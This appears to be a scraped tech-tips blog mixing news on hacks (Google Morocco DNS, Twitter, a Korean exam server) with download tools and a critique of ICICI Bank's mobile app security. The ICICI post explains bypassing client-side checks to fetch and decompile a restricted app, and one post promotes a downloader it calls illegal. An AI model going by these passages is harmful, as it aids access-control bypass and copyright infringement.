Google.co.ma, the domain name for Google Morocco’s search portal, was taken hostage by hackers earlier today reportedly for several hours before the problem got fixed (it’s working fine again now). We got a bunch of tips about it, and the situation lasted long enough for lots of people to take screenshots of the website the domain name briefly pointed to due to the hack.

You can find loads of screenshots here  and here , but the main domain name pointed to the website shown on top of this post.

There’s a bit of confusion about how the hack was performed exactly, but it appears as if the hackers found a way into NIC.ma , which controls the DNS for the country, and targeted the Google domain name especially. The domain was pointed to a different server, and the web page above was shown when people tried to access the search engine. Google apparently at one point automatically relayed visitors from Morocco to Google.com instead of Google.co.ma, but it took a while to get the latter functioning correctly again.

PAKbugs.com leads to a forum where Pakistan hackers hang out, and the names on top of the web page above are all members of the message board. They’re being proud of it here

This website (in French) claims that this isn’t the first such incident this year, as apparently the websites for Google Algeri and Google Puerto Rico were taken hostage by hackers last month too.

Read More

Download Music From Last.FM

You can listen to Last.FM on your iPhone, G1 and your PC/Mac but you can’t have mp3 files. With Last.Fm Downloader you can! It’s free and has no spyware, viruses.





FYI:

Last.FM downloader is pretty much illegal to own because you are downloading songs that are copyright material, but I am sure you have P2P software such as LimeWire, Strong DC++, Kazaa etc…

Use it at your own risk.

Currently this is only supported in Windows.

Thanks for the Link:NirmalTV

Read More

How To Download YouTube Videos or Convert To Mp3 3gp Mp4 Etc

These few websites will provide you great tools to download youtube videos or convert them into Mp3, Avi, 3GP or Mp4 for iPhone,  iPod .

1.KeepVid - Easy to use and they also have toolbar for easy youtube video download.

2. WikiHow - Few methods that will give you enough info on how to download videos to iPod

3. Vixy - Best tool out there! Allows you to convert flv files online into mp3 or any other file you can think of!!

Read More

How to Use MSN Web Messenger with Hotmail Account

MSN Web Messenger is as of today Integrated with your HotMail account. You can basicaly use web msn messenger and talk to others while composing new email.

To message someone go to contacts, click on the person you would like to talk to and click on “Send an Instant Message (Available).

Or better yet, sign up with Gmail

Read More

Download and Sync YouTube Videos to iPod or iPhone

Here are some basic step by step guides that will show you how to download youtube videos to iPhone or iPod.

Best way to get FLV file from Youtube and convert for iPod or iPhone is via vixy.net. Works for Mac and Windows users.

Windows users can use AVS Video Converter that lets you convert FLV files to any file you can think of and it’s free too (see AVS4You)

Hope this short tutorial helps you get all the youtube videos you want on your iPhone or iPod Touch in our case.

Read More

How to Save Web Pages and Blogs for Offline Reading

Store Web Pages for Offline Viewing

If you have Google Desktop running in the background, you already have a local copy of all web pages that you have recently opened / read in any browser on your computer. You can click "Browse Timeline" inside Google Desktop and your web history will be listed in reverse chronological order - the most recently visited websites will be listed at the top.

The problem with web history in Google Desktop is that it can get cluttered too easily and finding relevant pages from the history may require some effort.  In that case you may install Scrapbook for Firefox and only save relevant web pages that you intend to read in an offline environment.

Scrabbook, like Google Notebook, is primarily for organizing web research but it’s an excellent offline browser as well. You can specify the depth level and all target links from the current web page (up to that level) will be saved offline automatically. For instance, you want to read all stories on the CNN and BBC website offline. Capture the home page with Scrapbook and set the depth as 1 - it will then save full text of all the front page stories as well.

Scrapbook can export all the web captures as an HTML web page so you can easily read the saved content on a mobile phone or your PDA. Another popular tool for downloading web pages in Firefox is DownloadThemAll.

The limitation with either of the above tools is that they work only in Firefox and also require some manual work. What if you want to read all front stories from all major news websites while offline? All news sites provide RSS feeds but they aren’t full text so you have no option but to scrap content from the main website in order to read it offline.

HTTrack is a free website copying software where you can create download jobs and execute them whenever you go online. For example you can create a single download job for all news websites (like BBC, NYT, etc.), set the depth limit as 1 and get an offline version all the front news stories in one go. You can also save this job and re-execute it anytime later either manually or set it up as a scheduled task.

Another good alternative to HTTrack is wget available for Mac, Windows and Linux. You don’t have to spend time learning the complicated command line switches of wget as there are nice GUI apps available both for Mac (CocoaWget) and Windows (WinWget).

Download Blogs for Offline Reading

Blogs, or websites that offers RSS feeds, are much easy to handle and save because we know exactly what stuff has changed since we last visited that site.

There are two categories of blog readers - (a) Addicts or people who are subscribed to several hundred feeds and want to read them all while offline and (b) Casual Readers or people who follow only a dozen or so feeds.

Casual readers can simply add their favorites feeds to Tabbloid and download them all as a PDF newsletter (example).

For people who fall in the category of addicts, the solution that will work best is a dedicated offline reader that can pre-fetch all the new articles and here are some good choices:

My first recommendation has always been FeedDemon - it’s fast, rich in features and the upcoming v2.8 is even better since it lets you export unread items as an HTML web page that can be read on any device.

If you are subscribed to feeds in Google Reader, you can either try RSS Bandit or  Scoop - these are desktop based readers that work in offline mode and can synchronize with your Google Reader subscriptions. If you are on Bloglines, a similar solution for you exists in the form of GreatNews - a desktop RSS reader that is also portable. Google Gears is another solution for Google Reader users but it has limitations.

The advantage with either of the above solutions is that they all support synchronization - so if you mark an item as read in an offline environment, the change will get propagated when you go online next so there’s no double work.

Saving Blogs & Web Pages for Mobile Phones

If you plan to save web pages for offline viewing on a mobile device (with a small screen), I would recommend Web2Book - it not only downloads multiple web pages and blogs in one go but also converts them into formats like HTML or PDF that are supported on almost every mobile device.

Web pages saved with Web2Book can be easily read on ebook devices like the Microsoft Reader or the new Sony Reader. Another option for mobile devices is Plucker - it’s an offline browser available both for Windows Mobile and Palm based PDAs.

If you are an iPod owner (the old models, not the latest iPod touch), you can even turn your MP3 player into a notes reader and read web pages as plain text.

Drawloop, an online service that I mentioned in the previous Adobe PDF guide,  too can join multiple web pages and save them in a single PDF file like in this example where you have the home pages of three news websites saved in a single file.

source:labnol

Read More

Creates Auto-Starting Installer CDs for Any Applications

Windows only: Free app Install-It puts a small auto-starting application on any removable drive that makes installing applications a double-click affair.

After downloading the Install-It package, you'll want to extract its files to somewhere you can reach, like your desktop, and open up the Install.ini file in your favorite text editor. This file is simply a list of program descriptions and the locations of their installer files. If you're creating a disc full of useful installers, just replace the default examples with your chosen verbiage for each app and the location/names of the setup files. You separate those two items with a comma, using slashes where necessary, and end each line with a semi-colon.

Here's an example Install.ini I made for a supposed Windows XP re-installation:



Copy all your installer files and Install-It's files into a CD-burning app, such as CDBurnerXP, and fire away.

Now you've got a CD that, on most computers, will pop up with a list of programs that can be installed without anyone having to guess which icon or cryptic filename means. If a computer isn't set to auto-start when it detects an autorun.inf file, though, you'll have to point the computer to install.exe—not a problem, though, if you've put each application in its own directory.

Install-It is a free download for Windows systems only.

Install-It [via The Red Ferret Journal

Read More

How To Identify Fonts Being Used In Images

Have you ever encountered problems in identifying what fonts is being used in an image? Of course fonts being used in popular movie banners can be found easily because you have the keyword but what if you found a free template and the font is not included? You either recreate the buttons with your own fonts replacing the original, or try posting in forums and hope that someone would have seen that font before and let you know what is the font name. There are so many fonts, maybe hundred of thousands fonts available on the internet and to identify an unknown font is definitely NOT an easy task!

If you need to identify a font, don’t despair. I have found 2 methods that is able to help you identify an unknown font. If it is not able to help you identify the font, it will at least help you narrow down to the closest ones.



Identifont, a free service offered to help you identify fonts by answering a series of simple questions about its appearance.

 

[ Identify Unknown Fonts with Identifont ]

 

Images can be color or black & white, and they don’t have to be very high quality (although that helps). Even a digital photograph of some lettering you like can be accepted. Accuracy of results is unprecedented by previous automatic systems. [ Identify Unknown Fonts with WhatTheFont ]

Finally, if WhatTheFont system is unable to give you a good match of the font you’re looking for, you can then submit your image to WhatTheFont Forum to have your image viewed by font geeks the world over.

Read More

3 Ways a Twitter Hack

Just days after popular social networking tool Twitter was hit was a phishing scam, the company is now trying to clean up a mess surrounding a separate hacking attack.

Over the weekend, some Twitter users received scam tweets, or direct messages, to visit certain sites or blogs. The URL in the message redirected users to a bogus login page in an attempt to steal login credentials for a phishing scheme. Monday, thing got worse as Twitter officials revealed several high profile accounts, such as those of Britney Spears and Barack Obama were hacked.



"It appears someone gained access to the tools Twitter uses to control its millions of accounts," explained Graham Cluley, a senior technology consultant at security firm Sophos PLC. "Internal tools used by the tech support team were compromised. It's not clear if it was an inside job, or outside hacker. Twitter does say they think it was an individual."

The hack, according to Cluley, is much more serious than the earlier phishing attack because it was compromise of the system that potentially exposed all Twitter users to the following dangers.



Fraudalent password use If you gain access to someone's Twitter account, you might be able to gain access to their password, said Cluley.

"We know that 41 percent of people admit to using the same password on every web site and account that they access," he said.

Hackers, while gaining access to something seemingly simply like a username and password to one account may very well be able to use the information to gain access to more important information, such as your bank account.

Malware Infection Twitter officials said 33 accounts had been attacked in the latest hack, including high-profile users such as Britney Spears and Barack Obama. The hackers used their temporary access to send offensive messages. CNN journalist Rick Sanchez found his account had been hacked with a message that read "i am high on crack right now might not be coming to work today."

The damage could have been much worse, said Cluley, if the hacker had decided to take a different approach.

"Imagine if instead, in the case of Britney Spears account for example, that the hacker had posted a link that said: 'Here's my new video. Click on this link.' Imagine how many people would have clicked on that and it could have pointed to malware? And Barack Obama is one of the most followed people on Twitter. If he said: 'I've just made a new speech. Check it out.' a lot of people would click on that link and get infected."



source:network world

Read More

Hacker opens gaping holes in CSAT score security

As the investigation into the leak of college entrance exam results rolls on, prosecutors said yesterday that the computer server at the Korea Institute for Curriculum and Evaluation, which administers the exam, had been hacked over 200 times. Not only the test results but also the institute’s internal information was stolen.



According to prosecution and police sources, a manager at a public relations firm called Inuni Co. whose surname is Kim accessed the institute’s server over 200 times between August 2007 and December 2008.



A detention warrant was filed against Kim on charges of breaking information and network laws but it was rejected by the court.



Kim easily broke into the server. In August 2007, he accessed an employee’s e-mail account at the institute. Kim obtained the e-mail ID from a press release, and the password was the same as the ID.



Kim tried to log in to e-mail accounts of other institute employees over 50 times. One of his successes was with the account of someone in the institute’s administrative office. The employee used a password identical to the romanized spelling of his name.



One of the employee’s e-mails contained an attached file containing the passwords of five other employees at the institute. The employee temporarily managed the other employees’ e-mail access information because he dealt with changes in the institute’s server. Their passwords were identical to the last seven digits of their residential identification numbers.



In this way, Kim downloaded 16 types of internal information from the institute. Among the materials downloaded were plans to grade answer sheets from the 2009 College Scholastic Ability Test, scoring schedules and the number of students who missed the test.



“Kim could look at the Korea Institute for Curriculum and Evaluation’s internal information by accessing the e-mail of seven employees,” a prosecutor said.



Kim passed the information on to VisangEdu, a private education company. VisangEdu made the CSAT score analysis public on Dec. 9, a day before the CSAT results were announced.



Kim accessed the institute’s server four times on Dec. 10 after the institute requested a probe into this case.



As the investigation closed in on him, Kim destroyed a memo containing the IDs and passwords of the seven employees. Prosecutors plan to decide what kinds of charges they will file against Kim and a VisangEdu director whose surname is Jin this week.

Read More

Get things Insurance

This is a world of uncertainties and no one can guess what may happen the next moment. To be frank you should not thing that is a way of looking things from a negative point of view. This is a step for being cautious. For instance you might have put in a good part of your savings and bought your dream car. It is also very important to get a car insurance as it will help you get a cover and get reimbursements in case some unforeseen things happen. If you are looking to get a cheap car insurance then Maczoop is he perfect destination for you. The site helps you to get various quotes, compare and contrast and then choose the best one which will fit in your requirements. They have also got some valuable information and tips on auto insurance and this will be very helpful when you are going to take one. Get things insured and stay secure!

Read More

Dissecting iMobile - Security Analysis of ICICI Mobile Banking App

ICICI Bank’s iMobile website has some of the worst server side validations ever, which is what prompted me to download the mobile app’s JAR file, study it in detail and write this post. According to the website, until the Reserve Bank of India comes out with mobile banking guidelines and approves it, mobile banking is supposed to be halted. Technically, it means that, all existing users shouldn’t be able to use the service what-so-ever and new user signups should be prevented & a notification stating that they should retry later should be shown.

Therefore, in this scenario, I shouldn’t have been able to download the app to my mobile device. The website of ICICI fails in not enforcing this by providing the following ways:
Existing users who have already installed the app are given an option to ‘Upgrade’ from within the mobile app itself. This opens up a webpage in the phone’s native browser, whose URL is http://mobile.icicibank.com/upgrade?version=null.
The actual iMobile website has some stupid javascript validation, which is very easy to bypass using modern browsers. Heck, just by browsing the HTML source code of the page, you will be able to easily find the URL for the application JAR files. Put 2 and 2 together and you will be able to download the app.

Which brings me to explain Step 2 in detail:
On any browser, go to View->Source. This will display the source code of the rendered HTML page. Notice the first It contains many functions & the most important functions to us are “submitForm” and “displayOption”. The line of interest in submitForm method is document.jump1.action="https://infinity.icicibank.co.in/web/apps/"+fileName;. That line pretty much gives away everything. All you have to do is, navigate to the above mentioned URL and append a filename to it for download.

What filename do you have to give and How?
That’s where our displayOption function is very useful. That function contains a set of simple If-Else conditional statements, which have the respective filenames. For e.g. if you want to download “M20P1520ALL1.jar”, then just append it to the URL & access it using the address bar. Therefore, the URL becomes https://infinity.icicibank.co.in/web/apps/M20P1520ALL1.jar Being a JAR file, most browsers will display a “Save As” dialog box. Now, just download the file and transfer it to your mobile. The application is fairly straight forward.

Where ICICI Bank failed?
They should have disabled the link mentioned in #1 above and replaced it with some text that says, “RBI mobile banking guidelines blah blah…”. But some clever users will bookmark the link to the JAR file and try to access the JAR file by bypassing the link itself. When they do that, the web server should return a “404 - Resource Not Found” error. Got it? Implementing this is pretty simple.
There shouldn’t have been such a lot of useless javascript on the page. Firstly, they should have removed the device selection drop down box. Secondly, they should have replaced this page with an alternative. Thirdly, this mobile banking link should have been removed in the home page itself. Fourthly, they should have validated on the server for JAR file downloads and should have displayed the “404 - Resource Not Found” error page.
Ok. Leave aside #1 and #2. At least the mobile app should have thrown soft errors when users try to access mobile banking from the JavaME app. Any bank would store all activity data for a certain period of time. So when you access the bank’s service from a mobile device, the server software surely knows about it, which means, the server software should have returned errors to the user instead of allowing the user to do transactions.
There’s one more bug in the app itself. When you launch the app, it will prompt you to sync the data on the device to its servers for faster access the next time. When you click “OK” to synchronize, it will wait for a few minutes and show a message as, “There is no data to synchronize”. When you proceed further and try to access your info, it will again prompt you to sync the data. That’s frustrating. Either you should sync the data properly or you should access the server every time over a secure channel. As simple as that. That’s not followed too.
For me, all these things imply only thing. ICICI wants the existing users to continue using the app, thereby disobeying RBI’s orders or they are having some really bad programmers who don’t know the stuff they are doing. At a time when people fear about Google tracking their internet usage, this is MY/YOUR FINANCIAL INFORMATION, which is at risk Right?

That was a long post already We still have some more to go. Lets take a break.

Image Credits

Back? Ok Now, lets dissect the actual JAR file and look into the technical details of its implementation.

The Manifest File:
Rename the .JAR extension to .ZIP extension and extract it to your favourite folder. Open the “META-INF” folder and open the “MANIFEST.MF” file in a text editor. As you will note, it contains lots of very valuable information, especially the socket URLs of various mobile service providers. User agent is also very interesting. When sending HTTP requests through the application, it uses that property for setting the “user-agent” HTTP header. They also have debug strings enabled, which means by snoping around using a good file manager for your mobile, you will be able to get technical errors! thereby, letting us know how the app works itself, what requests it sends, its behaviour etc.

Another important item is, “MIDlet-Name” property in the manifest. This property determines what name the user sees after he installs the app on his mobile. Using the same name, when future upgrades are made available, the app is just replaced in place of the old one, which means, if you modify the “MIDlet-Name” property and install the app again, you will have 2 copies of the same app. THIS SHOULD NEVER BE ALLOWED FOR A HIGHLY CRITICAL FINANCIAL APPLICATION. Isn’t it? As an example, try changing the MIDlet-Name of the Yahoo! Go JAR file and try to install the app again on your mobile. My E51 shows an “Invalid JAR” error message because of MD5 sum checks etc.

Some more Holes:
Now, move back to the folder where the JAR file has been extracted. It contains a bunch of .class files. Pass it through a decompiler. You will get “perfect” java source code files. The code looks obfuscated. But its not obfuscated enough. Anybody will be able to make good sense from the source code. All the URLs, all the used strings and everything else will be clearly visible. By using the app on your mobile side-by-side, you will be easily able to go through the source code. All in all, I wouldn’t use this app anymore until the security measures are tighter.

What should the bank do here?
Shouldn’t allow the installation of 2 apps of the same JAR with different names. Take this example of the Yahoo! Go JAR file.
I guess these mobile providers’ socket URLs are used for a one time basis to send verification SMS. If that be the case, they shouldn’t be present in the manifest file for a variety of reasons that I won’t discuss here.
There’s an interesting property named “WSCDomainName” in the manifest file. I guess it expands to “Web Service Client Domain Name”, though I’m not sure about it. Suggestion: Encrypt the name value pairs.
Most importantly, sign the application using the Java Signed program. C’mon, users are doing financial transactions and a signed app will increase their confidence of using this application.

Suggestion for Users:
Users should install these kinds of apps on their mobile’s inbuilt memory, instead of the memory card. That is, when you connect your phone to the PC in thumb drive mode, all the RMS file stores for the mobile app are clearly visible. There are many decoders available on the internet that can read content from the RMS file stores. When you store this app on your mobile’s inbuilt memory, you can’t read those stores directly and there are a number of checks in place, that prevent reading it.

Thats about it !

Of course, this blog post can’t be termed as a full fledged security analysis. But most of what has been ignored by the bank are mere basics. They must have more secure systems in place.

Read More

How to open mobile websites on your PC browser

There are a number of use-cases for which you would want to browse a mobile-optimized website on your PC. When you visit the mobile website on your PC’s web browser, the website displays the full content much to your dismay. However, when you visit the browser on a mobile, it displays a perfectly mobile optimized page.

In these cases, there are some simple steps that you can follow to open mobile websites on your PC:

1. Download and install the latest version Firefox from http://www.getfirefox.com/.


2. Visit Firefox Add-ons page and download the Modify Headers addon.


3. Install the addon and restart firefox.


4. From the firefox window, select “Tools” menu & click on “Modify Headers” option (Tools -> Modify Headers).


5. The window will open as shown:
   
   Click to enlarge


6. Below the title bar, there’s a drop down. Select “Add” from the drop down box.


7. Now in the text box next to the drop down, type “user-agent”.


8. In the third text box, paste this string - Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE51-1/100.34.20; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413.


9. Click on “Save”.


10. The screen should look like as shown in the screen shot below:
    
    Click to enlarge


11. Using the buttons on the Modify Headers addon window, you can enable or disable particular items.


12. That’s it! Whenever you want to view a mobile website, just go to Tools->Modify Headers and enable the user agent you added in step 8. When you don’t need it, just open this window and disable it.


13. You can close addon window after you have enabled/disabled items.


14. Enjoy!

Read More